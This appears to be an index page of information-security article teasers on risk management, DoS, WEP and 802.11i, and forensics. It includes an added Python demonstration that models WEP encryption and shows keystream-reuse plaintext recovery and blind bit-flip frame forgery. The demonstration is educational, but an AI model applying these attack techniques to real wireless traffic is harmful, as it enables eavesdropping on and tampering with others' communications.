Companies have always had to deal with different types of risk, be it financial, legal, the success of a new product launch or a merger, or the threat of natural disasters. These risks are traditionally treated as silos. The CFO is responsible for understanding and making decisions pertaining to financial risk. The IT department is responsible for the risk of losing data processing capabilities. Legal council is responsible for understanding and managing the company's legal issues. And so on. But this fragmented approach to risk is becoming more dangerous as companies face risks that threaten the company's overall existence. These risks come in the form of noncompliance with government regulations, increasing information security threats, terrorist activities and natural disasters. It is important now more than ever, for companies to develop and maintain a holistic risk management program that coordinates these silos because they all have the same overall goal – to protect the company and its assets.
View Article
Understanding Standards for Risk Management and Compliance
Regulatory requirements are driving companies to look into risk management more than ever before. SOX, HIPAA and GLBA all require risk analysis and management. But organizations looking for a solution can quickly find themselves swimming in a sea of acronyms that includes NIST 800-30, AS/NZS 4360:2004, OCTAVE, COSO and CobiT.
View Article
Risks Associated with Outsourcing
Although outsourcing can greatly reduce labor costs, because countries have different laws, regulations and enforcement motivations, many companies have to deal with a range of unfamiliar issues to ensure their work is secure. For example, in 2002, ...
View Article
Denying Denial-Of-Service
New solutions fight DoS/DDoS by automatically detecting and blocking potential attacks. Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks have been around for years, but with reports that 4,000 DoS attacks are launched each week, it's clear the problem isn't close to being resolved. In fact, in a recent poll of Information Security readers, 90 percent said they remained either "very concerned" or "somewhat concerned" about DoS or DDoS.
View Article
Security Strategies for E-Companies - The Science of Secrets
Cryptology continues to evolve as our need for keeping secrets increases. Cryptology, the science of secure communications, is as old as civilization and the written word. Throughout the ages, everyone from kings to shopkeepers has employed codes to gain a competitive edge, reduce vulnerability, hide their true intentions or revel in the comfort of knowing something that someone else doesn't.
View Article
802.11 Security Shortcomings
Wireless communication has been around for years, but only recently has it ascended to the status of a mainstream communication method. Portable devices (e.g., PDAs, cell phones, laptops) have proliferated, giving mobile users access to email accounts, Internet sites, online banking, and the stock exchange. This proliferation has led to WLAN vendors scurrying to develop proprietary wireless network solutions and application vendors hurrying to code new wireless programs.
View Article
Learning from SQL Slammer
Many people might have heard of the Slammer worm, but few people fully understand the root of the attack. Familiarizing yourself with Slammer's methods can help you evaluate the risk to your environment and prepare for future attacks by similar worms.
View Article
Greater WLAN Security with 802.11i
To improve the standard and close holes in current wireless implementations, IEEE developed the 802.11i Task Group. To address each of the aforementioned flaws, this group has developed a new authentication framework that encompasses several components.
View Article
How 802.11i Addresses WEP's Core Deficiencies
Wired Equivalent Privacy (WEP) contains three core deficiencies. The first deficiency is the use of static encryption keys. The second deficiency is the ineffective use of initialization vectors (IVs). The third deficiency is the lack of packet integrity assurance.
View Article
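An added example, not code from the article, that demonstrates the second and third deficiencies listed above on a model of WEP frame encryption (24-bit IV prepended to the shared key to seed RC4; a CRC-32 integrity check value, ICV, appended to the data and encrypted with it). Reusing an IV under the static key (deficiency 1 makes this inevitable: the IV space is only 2^24 frames) yields the same keystream, so XORing two ciphertexts cancels it and exposes the XOR of the plaintexts; and because CRC-32 is linear, an attacker can flip chosen plaintext bits through the ciphertext and patch the encrypted ICV without knowing the key. The RC4 routine is written out here for the example; the key, IV and frame contents are constructed.

```python
import zlib


def rc4(key, length):
    """Plain RC4 keystream of the given length (the stream cipher WEP uses)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                    # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key, iv, plaintext):
    """Frame = IV || RC4(IV || key) XOR (plaintext || CRC32(plaintext))."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4(iv + shared_key, len(plaintext) + 4)
    return iv + xor(plaintext + icv, keystream)


def wep_decrypt(shared_key, frame):
    """Return (data, icv_ok); a receiver accepts the frame only when icv_ok is True."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + shared_key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    return data, zlib.crc32(data).to_bytes(4, "little") == icv


def keystream_reuse_leak(frame1, frame2):
    """Deficiency 2: two frames under the same IV share a keystream, so
    C1 XOR C2 == P1 XOR P2. Knowing one plaintext reveals the other."""
    assert frame1[:3] == frame2[:3], "demonstration needs a repeated IV"
    return xor(frame1[3:], frame2[3:])


def bitflip(frame, mask):
    """Deficiency 3: flip plaintext bits selected by `mask` and fix the ICV blind.
    CRC-32 is affine: crc(p ^ m) == crc(p) ^ crc(m) ^ crc(zeros), so the change
    needed in the (encrypted) ICV depends only on the mask, never on the key."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(mask) == n
    icv_delta = (zlib.crc32(mask) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(body, mask + icv_delta)


# Constructed values for the demonstration.
KEY = b"secretkey"          # the static shared key every station holds
IV = b"\x00\x00\x01"        # a 24-bit IV; with 2**24 values it repeats on a busy network
P1 = b"balance: 100 USD"
P2 = b"balance: 900 USD"

if __name__ == "__main__":
    f1 = wep_encrypt(KEY, IV, P1)
    f2 = wep_encrypt(KEY, IV, P2)
    leak = keystream_reuse_leak(f1, f2)
    print("recovered P2 from P1 and the leak:", xor(leak[:len(P1)], P1))
    forged = bitflip(f1, xor(P1, b"balance: 999 USD"))
    print("receiver sees:", wep_decrypt(KEY, forged))
```

Both properties are fixed in 802.11i by the design changes the next entry describes: TKIP and CCMP derive fresh per-packet keys so a keystream is never reused, and the MIC (Michael for TKIP, CBC-MAC for CCMP) is keyed, so an attacker can no longer recompute the integrity value after changing the data.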
Vulnerability Mismanagement
The following are seven must-have elements of a successful vulnerability management program. They're not about scanning or applying patches; they're the essentials that will enable you to efficiently and effectively find and remediate vulnerabilities.
View Article
To Catch a Thief
Understanding the requirements of bringing the necessary forensics capability in-house and the most popular tools in use today.
View Article